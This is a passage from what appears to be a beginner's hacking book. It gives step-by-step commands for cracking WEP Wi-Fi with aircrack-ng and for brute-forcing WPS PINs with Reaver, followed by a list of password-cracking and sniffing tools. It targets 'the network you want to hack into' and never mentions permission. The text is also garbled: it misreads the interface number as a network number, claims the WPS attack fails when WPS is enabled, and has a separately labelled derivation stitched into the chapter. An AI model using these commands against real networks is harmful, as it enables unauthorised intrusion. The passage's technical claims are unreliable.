1. Determine the name of the wireless adapter. It is possible that the target computer will have multiple networks. If that is the case, then you will have to know the name of the one you want to scan. You are looking for one that says “wlan”. If it says “eth” for Ethernet or “lo” for loopback, then it won’t be the one we are looking for. To see all the adapters the computer has, type in “ifconfig” using a terminal. Just take note of the wlan adapters.
2. Turn on monitor mode. You can do that by using the “airmon-ng start wlan0” command. The “0” in this command stands for the network you want to hack into. Just set the number of the network of your choice in place of that “0”. Typing in this command will create a virtual console which is known as a monitor. It may be called “mon” on your display.
If you are using the latest version of Kali Linux, you may see a different name for the monitor than just “mon”. It could be “mon0” or “wlan0mon”. Also, the airmon-ng command may not work properly for you. If that happens, try using airmon-ng check kill. This command looks like this: “airmon-ng <check|check kill>”.
3. You can begin capturing packets. This simply means you are intercepting pieces of data that are moving across the network connection. You can use the “airodump-ng” command to begin the capturing process. This will take data from the packets that are moving through the air. When you do that, you will see the name of the target network.
4. From there, you can store the packets you capture in a file. Do this by using the “airodump” command. The full command you will use will look like this: “airodump-ng mon0 (plus the name of the file you want to capture)”. In this example, the “0” in “mon0” is the name of the network. So the number you use may vary from the example given. You can find the packets you captured in files that look like this: “(name of the file).cap”. You can’t do this right away though. You have to wait until there is enough data available.
5. The Wi-Fi is cracked. At this point, you can just type in the command “aircrack-ng” in order to determine the password. Remember, this takes a few seconds, so don’t expect instant results every time. This command needs to be performed in a new terminal.
6. The program may ask you which Wi-Fi you want to hack into, but only if there is more than one to choose from. You should get in pretty fast, if the password is weak. For very strong passwords, you will need more packets. The program is going to try again for itself once you have 15,000 packets, and if it is unsuccessful, it will keep trying at each new 5,000 packet milestone.
9
HACKING WPA AND WPA2
Hacking into a WEP network is pretty easy. The security just isn’t that tight, as we have previously discussed. To hack into a WPA or WPA2 network will take some extra effort. You might not even be able to find a way in using Kali Linux. A brute force attack could take as long as several years. It depends on the length of the password and various other factors that create security for the network.
The problem with WPA tech is that it can be really hard to configure. To make it easier, WPS is added to complement WPA, but it does come with an exploitable hole, and programs like Reaver are excellent at getting through that hole. The attack can still take several hours to complete, but it is better than not being able to get through for years.
WPS sends an 8-digit PIN to the client. These PINs only contain numbers, so there is a limited number of guesses it would take to crack it. Still, with all the possible choices, trying each guess can take a very long time. WPA uses characters, numbers and letters, so guessing the password can be infinitely tougher. In WPS, there will be a slight delay in waiting for the APs to respond. You will probably only be able to get in a few keys per second. Even at that speed, it can still take years to get in, but thankfully there are some weaknesses to exploit.
We know that the 8th digit is always a checksum of all the previous digits. This cuts down the possibilities considerably, but it would still take far too long to make it worth our while. We can also break down the PIN number into two separate parts, which makes the work go twice as fast. What this boils down to is 11,000 guesses, though odds are we won’t have to exhaust them all before we find the answer. This means it should take about three hours to go through every guess, so you are looking at somewhere less than three hours for the hack. If you are trying keys slowly, though, it can take much longer.
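The 11,000 figure can be reconstructed from the PIN structure described above. This is an added worked derivation, not text from the book; it assumes a PIN of 7 free digits plus one checksum digit, each half confirmed by the AP separately (the first 4 digits, then the remaining 3 digits plus the checksum), and the roughly one-guess-per-second rate implied by the three-hour estimate.

$$
N_{\text{naive}} = 10^{8}, \qquad
N_{\text{with checksum}} = \frac{10^{8}}{10} = 10^{7}
$$

$$
N_{\text{split}} = \underbrace{10^{4}}_{\text{first half}} + \underbrace{10^{3}}_{\text{second half, checksum fixed}} = 11{,}000
$$

$$
T \approx \frac{11{,}000\ \text{guesses}}{1\ \text{guess/s}} = 11{,}000\ \text{s} \approx 3.1\ \text{h}
$$

The split verification is what brings $10^{7}$ down to $11{,}000$, so on the access point side the effective mitigation is to disable the WPS PIN method (or WPS entirely) rather than rely on the PIN length.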
To perform the attack, you won’t need to do a lot of complicated work. If you have everything in place, then you can simply put in the command:
“reaver -i (interface-name) -b (BSSID of your target)”
If you know how to hack a WEP, then this is basically the same process. We are working with Reaver this time, which makes things easier for you, but it is still harder overall, since you are hacking into a WPA or WPA2 instead of the much simpler WEP.
1. Start up Kali Linux, then begin monitor mode. The command for that is: “airmon-ng start wlan0”. Like with the last hack we showed you, the “0” represents the network name (which is a number). Once you know that name, substitute our “0” for the correct number.
2. You will need the BSSID number of the network you are going to hack into.
3. If WPS is enabled, then this hack won’t work. If you want to check WPS activation, then use the “wash” command or “airodump-ng”. Using wash is pretty easy since it is designed specifically for this purpose.
4. The wash command goes like this: “wash -i mon0”. Remember to substitute that “0”. This will also start up your system in monitor mode. If you see any networks after you have used wash, then WPS is enabled and you will likely have to give up.
5. The BSSID number will need to be combined with Reaver for your next command. This is “reaver -i mon0 -b (BSSID number)”. Reaver has more advanced options you can use, and you may want to make use of them to increase your hack’s efficiency. The -vv option, for example, makes your tool more verbose, telling you what is happening right on your terminal. So if you are experienced at hacking and using Reaver, then this is an invaluable asset. It also helps you sort through problems as they happen. If you are going to use this tool, just type in the command “reaver -i mon0 -b (BSSID number) -vv”.
6. Now you’re in. If you are having any trouble or the process is taking far longer than it should, then you may need to kill some processes. This will free up some memory for you to use.
If you need more information, please check the additional resources section of this book.
10
ADDITIONAL RESOURCES
Here are some hacking software tools you can use to make your life a little bit easier. It’s best to start out with what was covered earlier in this book. Then, once you are comfortable, move on to test some of these out.
Aircrack
This ranks among the most popular password crackers out there. It comes with an installation tutorial, so it should be easy enough to use. It performs a WEP attack, so make sure that you are using this software for the right kind of network. You should also ensure that the wireless card can inject data packets. If it can’t, this tool won’t be much help to you. You can find Aircrack right here.
Airjack
You will be exploiting man-in-the-middle flaws with this tool. It’s a packet injection program that is available right here: http://sourceforge.net/projects/airjack/
Onlinehashcrack.com
Using dictionary attacks, it guesses passwords for you automatically. It works on WPA networks, and you can find it right here: http://www.onlinehashcrack.com
CommView for Wi-Fi
This protocol analysis tool also performs wireless monitoring. It can decode packets from both WEP and WPA networks. If you want to keep track of Wi-Fi traffic so you know exactly who is using your network, then this is a great tool for you. You’ll be able to get it here: http://www.tamos.com/products/commwifi/
inSSIDer
This one will cost you, but it is an award-winning scanner. It works on most versions of Windows as well as OS X. It is used to sniff out network LANs, and you can find it for about $20 here.
OmniPeek
OmniPeek only works on Windows OS. It is a network analyzer that captures traffic from the network. You can find this excellent troubleshooting tool here: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer
Wireshark
Like inSSIDer, Wireshark is great for analyzing network protocols. You can check network traffic with it, but it helps to have a decent understanding of how network protocols work. You’ll find this one here.
WepAttack
This Linux tool is open source, and it is great for breaking keys from 802.11 WEP networks. You will need a WLAN card for it to work, and it uses a fairly standard but somewhat slow dictionary attack. You can find it here: http://wepattack.sourceforge.net/
The majority of these are available for free and are updated regularly, so you should not have any problem downloading them and testing them out. You definitely want to look into the free tools first to see if they can do what you need before you look at paid ones.
Thank you for reading!